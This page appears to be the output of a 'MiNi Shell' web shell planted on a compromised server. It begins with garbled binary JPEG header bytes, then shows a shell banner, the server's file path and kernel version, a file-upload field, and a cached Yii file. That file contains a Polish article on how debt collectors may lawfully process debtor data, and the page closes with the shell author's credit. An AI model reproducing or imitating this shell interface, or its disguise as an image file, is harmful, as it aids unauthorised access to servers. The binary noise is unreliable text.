JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/cache/47/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/frontend/runtime/cache/47/471c95c2c24a19c598965c2ec15da96e.bin

a:2:{i:0;a:2:{i:0;s:15369:" 
                    
                    <h3 class="title" itemprop="headline">Dane dłużnika &#8211; kto, kiedy i w jaki sposób może z nich korzystać?</h3>
                    <p><span class="glyphicon glyphicon-time" aria-hidden="true"></span> <strong itemprop="datePublished"> 13-02-2013, 00:00</strong>
                        <meta itemprop="dateModified" content=" 13-02-2013, 00:00"/>
                        <div class="hide" itemprop="description">
	Samodzielne dochodzenie swoich należności od kontrahent&oacute;w jest dla wielu firm nie lada wyzwaniem, stąd coraz częściej banki, korporacje czy sp&oacute;łki telekomunikacyjne przekazują związane z tym obowiązki wyspecjalizowanym firmom zajmującym się zarządzaniem wierzytelnościami.</div>
                        <div class="hide" itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
                            <meta itemprop="name" content="ksiegowosc.org">
                            <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
                                <meta itemprop="url" content="https://www.ksiegowosc.org/images/loga/ksiegowosc.jpg">
                            </div>
                        </div>
                        <div class="hide" itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
                            <meta itemprop="url" content="https://common.v-manager.pl/">
                        </div>
                        <meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://www.ksiegowosc.org/artykuly/szczegoly/12887"/>
                        
                                        </p>

                    <div class="lorem">
                        <table align="right" border="0" cellpadding="1" cellspacing="1" style="width:0px;">
	<tbody>
		<tr>
			<td>
				<img alt="" src="https://common.v-manager.pl/uploads/source/articles/12887/0_upload_f46936b289.webp" style="margin:5px;width:200px;float:right;height:133px;" loading="lazy" /></td>
		</tr>
	</tbody>
</table><p>
	<strong>Samodzielne dochodzenie swoich należności od kontrahentów jest dla wielu firm nie lada wyzwaniem, stąd coraz częściej banki, korporacje czy spółki telekomunikacyjne przekazują związane z tym obowiązki wyspecjalizowanym firmom zajmującym się zarządzaniem wierzytelnościami. Jednym z elementów tego procesu jest transfer danych osobowych dłużników - niezbędnych do kontaktu z nimi i prowadzenia procesów odzyskiwania niespłaconych należności.</strong></p><p>
	O tym jak wyglądają praktyki przetwarzania i ochrony danych stosowane przez firmy zarządzające wierzytelnościami opowiada ekspert - <strong>Rafał Lasota</strong>, wiceprezes ds. operacyjnych w Grupie Casus Finanse.</p><p>
	<strong>Drogi przekazania danych dłużnika</strong></p><p>
	Istnieją dwa główne sposoby funkcjonowania firm zajmujących się zarządzaniem długami. Mogą one działać na zlecenie pierwotnego wierzyciela na zasadach outsourcingu lub skupować portfele wierzytelności przejmując wszelkie jego prawa i obowiązki. W przypadku wierzytelności zleconych przekazanie danych osobowych następuje na mocy umowy o ich powierzeniu.</p><p>
	Administratorem danych pozostaje podmiot je powierzający. Na spółce działającej w imieniu wierzyciela spoczywa obowiązek zabezpieczenia danych i prowadzenia dokumentacji. Dane wykorzystywane mogą być wyłącznie w zakresie i celu wskazanym w umowie. Na przykład, w ciągu jednego roku, tylko w sektorze B2C, Grupa Casus Finanse obsłużyła na zlecenie wierzycieli pół miliona dłużników. Po ustaniu zakresu i celu przetwarzania danych, wszelkie dane osobowe dłużników są usuwane.<br />
	W przypadku nabycia wierzytelności, podstawą prawną przekazania danych dłużników jest cesja wierzytelności w oparciu o art. 509. §1. Kodeksu Cywilnego. Przepis ten daje wierzycielowi możliwość przeniesienia ich na inny podmiot - może on to zrobić bez zgody dłużnika, chyba że sprzeciwiałoby się to ustawie, zastrzeżeniu umownemu albo właściwości zobowiązania. Wraz z wierzytelnością przechodzą na nabywcę wszelkie związane z nią prawa, w szczególności roszczenie o zaległe odsetki.</p><p>
	Udostępnienie danych osobowych dłużnika jest niezbędne w celu zrealizowania uprawnienia wynikającego z kodeksu cywilnego, a więc dochodzenia wierzytelności. Zgodnie bowiem z art. 23 ust. 1 pkt 2 Ustawy o Ochronie Danych Osobowych, przetwarzanie ich jest dopuszczalne, gdy jest to niezbędne dla zrealizowania uprawnienia lub spełnienia obowiązku wynikającego z przepisu prawa. Firma nabywająca prawa do przeterminowanych należności staje się administratorem danych i to na niej spoczywają związane z tym, określone przez ustawę, obowiązki. Dla przykładu, Casus Finanse w swojej bazie posiada około 100 tys. rekordów wierzytelności własnych.</p><p>
	<strong>Co wiadomo o dłużniku?</strong></p><p>
	Firmy z branży zarządzania wierzytelnościami w swojej codziennej działalności muszą operować danymi służącymi identyfikacji dłużnika (imię, nazwisko, pesel) i kontaktowi z nim (dane teleadresowe). Są one także w posiadaniu szeregu innych informacji takich jak: kwota zadłużenia, data zawarcia umowy i data powstania zaległości oraz typ produktu, z którego korzystał dłużnik (kredyt, karta kredytowa, usługi telekomunikacyjne itp.)</p><p>
	Odrębną kwestią są dane wrażliwe, które w toku postępowania windykacyjnego może uzyskać firma zarządzająca wierzytelnościami. Za tego typu dane uważa się w świetle Ustawy z dnia 29 sierpnia 1997 r. informacje o: pochodzeniu rasowym lub etnicznym, poglądach politycznych, przekonaniach religijnych lub filozoficznych, przynależności wyznaniowej, partyjnej lub związkowej, stanie zdrowia, kodzie genetycznym, nałogach lub życiu seksualnym, skażeniach, orzeczeniach o ukaraniu, mandatach karnych, innych orzeczeniach wydanych w postępowaniu sądowym lub administracyjnym. Przetwarzanie takich danych jest generalnie zabronione - poza wyjątkami określonymi w art. 27 ust. 2. Dla branży windykacyjnej praktyczne (aczkolwiek ograniczone) znaczenie ma wyjątek ustanowiony w punkcie 10 tego artykułu.</p><p>
	Zgodnie z nim przetwarzanie danych wrażliwych jest dopuszczalne, jeżeli jest prowadzone przez stronę w celu realizacji praw i obowiązków wynikających z orzeczenia wydanego w postępowaniu sądowym lub administracyjnym. Przepis zezwala zatem na przetwarzanie danych wrażliwych dopiero od momentu wydania orzeczenia, a nie od chwili zaistnienia zdarzenia, które może być w przyszłości podstawą do jego wydania. Na etapie postępowania pozasądowego, gdy wierzyciel nie dysponuje jeszcze orzeczeniem nakazującym dłużnikowi spłatę (a na takim opiera w przeważającej mierze swój biznes branża windykacyjna) przetwarzanie danych wrażliwych jest zabronione.</p><p>
	W czasie kontaktów z osobami zadłużonymi może się zdarzyć, że pracownik firmy zarządzającej wierzytelnościami wchodzi w posiadanie informacji należących do grupy danych wrażliwych. Typowym przykładem pozyskania tego typu danych jest zdobycie informacji o fakcie pobierania przez dłużnika renty. Interpretacja tych danych może doprowadzić do tego, że pozyskano informację o „stanie zdrowia” dłużnika. Jednoznaczne przyporządkowanie wiedzy zdobytej o dłużniku do kategorii danych wrażliwych może nie być oczywiste. W przypadku pozyskania takich informacji nie są one rejestrowane i przetwarzane.</p><p>
	<strong>Priorytet: bezpieczeństwo danych dotyczących dłużnika</strong></p><p>
	Każdy podmiot, który w swojej działalności przetwarza dane osobowe, musi spełniać wymagania, które nakłada na niego ustawa. Do tych wymagań należy: obowiązek posiadania Polityki Bezpieczeństwa, Instrukcji zarządzania Systemem Informatycznym Służącym do Przetwarzania Danych Osobowych oraz spełnienie wymogów rozporządzenia do ustawy.</p><p>
	Zarządzanie wierzytelnościami nieodzownie wiąże się z pracą na danych osobowych. Szczególnie istotne w tej branży jest, aby oprócz spełnienia wymogów ustawy, opracować spójne systemy służące ich ochronie i bezpieczeństwu informacji. Ważne jest, by cały czas podwyższać standardy, dlatego  dążymy do tego, aby nasz system ochrony spełniał wymogi normy ISO/IEC 27001:2005. Niesłychanie istotne jest stworzenie szeregu procedur i instrukcji wewnętrznych, mających wpływ na bezpieczeństwo przetwarzanych danych. Pracownicy powinni natomiast przechodzić prowadzone przez Administratora Bezpieczeństwa Informacji (ABI). cykliczne szkolenia w tym zakresie W naszej firmie dane osobowe przechowywane są na serwerach zlokalizowanych w siedzibie spółki i przetwarzane w autorskim systemie w wysokim stopniu spełniającym wymogi zabezpieczeń narzucanych przez ustawę.</p><p>
	<strong>Granice wykorzystywania informacji o dłużniku</strong></p><p>
	Dane osobowe dłużnika mogą być wykorzystane wyłącznie w zakresie i celu wskazanym w umowie o ich powierzeniu. W przypadku windykacji celem jest odzyskanie wierzytelności, a wykorzystanie informacji o dłużniku do innych celów jest bezprawne.</p><p>
	Ustawa z dnia 29 sierpnia 1997 r. o ochronie danych osobowych za przetwarzanie ich niezgodnie z prawem przewiduje zarówno odpowiedzialność administracyjną, jak i karną, która szczegółowo uregulowana została w art. 49–54a ustawy. Za udostępnienie danych lub umożliwienie dostępu do nich osobom nieupoważnionym przewiduje karę grzywny, karę ograniczenia wolności albo pozbawienia wolności do lat 2.</p><p>
	W przypadku nieuprawnionego ujawnienia danych dłużnika powinien on zgłosić reklamację do firmy windykacyjnej i załączyć odpowiednie dowody potwierdzające stawiane zarzuty. Bardzo ważne jest, by tego typu „skargi” były bardzo szybko weryfikowane a dłużnik otrzymał odpowiedź na stawiane zarzuty. Do dnia dzisiejszego w naszej spółce nie zarejestrowaliśmy uzasadnionego incydentu.</p><p>
	W każdym momencie dłużnik ma prawo złożyć skargę do Generalnego Inspektoratu Ochrony Danych Osobowych (GIODO). Po uznaniu skargi za zasadną, organ ten może nakazać w drodze decyzji administracyjnej przywrócenie stanu zgodnego z prawem, a w szczególności usunięcie uchybień, uzupełnienie, uaktualnienie, sprostowanie, udostępnienie lub nieudostępnienie danych osobowych. Ponadto ma prawo wydać decyzję o zastosowaniu dodatkowych środków zabezpieczających zgromadzone dane osobowe, czy decyzję dotyczącą usunięcia danych osobowych. Generalny Inspektor jest uprawniony do skierowania do organów ścigania zawiadomienia o popełnieniu przestępstwa, jeśli stwierdzi, że pewien czyn lub zaniechanie narusza zasady ochrony danych osobowych.</p><p>
	Firma windykacyjna, która złamie przepisy o ochronie danych osobowych może narazić się na zarzut naruszenia dóbr osobistych dłużników. Zgodnie z art. 23 Kodeksu cywilnego dobra osobiste człowieka, w szczególności więc: zdrowie, wolność, cześć, swoboda sumienia, nazwisko lub pseudonim, wizerunek, tajemnica korespondencji, nietykalność mieszkania, twórczość naukowa, artystyczna, wynalazcza i racjonalizatorska, pozostają pod ochroną prawa cywilnego niezależnie od ochrony przewidzianej w innych przepisach. Art. 24 K.C. stanowi z kolei, że ten, czyje dobro osobiste zostaje zagrożone cudzym działaniem, może żądać zaniechania tego działania, chyba że nie jest ono bezprawne. W razie dokonanego naruszenia dłużnik może także żądać, ażeby osoba, która dopuściła się naruszenia, dopełniła czynności potrzebnych do usunięcia jego skutków, w szczególności żeby złożyła oświadczenie odpowiedniej treści i w odpowiedniej formie (przeprosiny). Na zasadach przewidzianych w Kodeksie Cywilnym dłużnik może również żądać zadośćuczynienia pieniężnego lub zapłaty odpowiedniej sumy pieniężnej na wskazany cel społeczny. Ponadto, jeżeli wskutek naruszenia dobra osobistego została wyrządzona szkoda majątkowa, poszkodowany może żądać jej naprawienia na zasadach przewidzianych w Kodeksie cywilnym.</p>
                        
                         


                           
                    </div>
                    
                    <div class="text-center">
                                        </div>

                                            
                      
                        
                        
                    
                                        
                                            <div class="nav-table tags mt05">
                            <div>Tagi:</div>    
                            <div>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=windykacja" class="label label-default">windykacja</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=dług" class="label label-default">dług</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=zarządzanie+wierzytelnościami" class="label label-default">zarządzanie wierzytelnościami</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=dane+dłużnika" class="label label-default">dane dłużnika</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=Rafał+Lasota" class="label label-default">Rafał Lasota</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=zarządzenie+długiem" class="label label-default">zarządzenie długiem</a>
                                                            </div>
                        </div>
                                            
                        
                    <div id="fb-root"></div>
                    <!--script async defer crossorigin="anonymous" src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0" nonce="2g9iczzS"></script-->
                    
<script>
//<![CDATA[
var lx=!1;window.addEventListener("scroll",function(){(0!=document.documentElement.scrollTop&&!1===lx||0!=document.body.scrollTop&&!1===lx)&&(!function(){var e=document.createElement("script");e.type="text/javascript",e.async=!0,e.src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(e,a)}(),lx=!0)},!0);
//]]>
</script>
                    
                    <div class="social text-center mb1">
                        <div class="fb-like" data-href="https://www.ksiegowosc.org/artykuly/szczegoly/12887_dane-dluznika-8211-kto-kiedy-i-w-jaki-sposob-moze-z-nich-korzystac" data-width="" data-layout="button" data-action="like" data-show-faces="false" data-share="true"></div>
                    </div>

                    
                    <div id="articles">    
                        
                    
                                    ";i:1;N;}i:1;O:25:"yii\caching\TagDependency":3:{s:4:"tags";a:2:{i:0;s:13:"article_12887";i:1;s:8:"articles";}s:4:"data";a:2:{s:32:"cc3494828475d7223b90ee23f0e9fa8c";s:21:"0.56712800 1746266001";s:32:"9f4ebfa1b76d6bc6617aec9034853422";s:21:"0.22954000 1749980350";}s:8:"reusable";b:0;}}

Creat By MiNi SheLL
Email: jattceo@gmail.com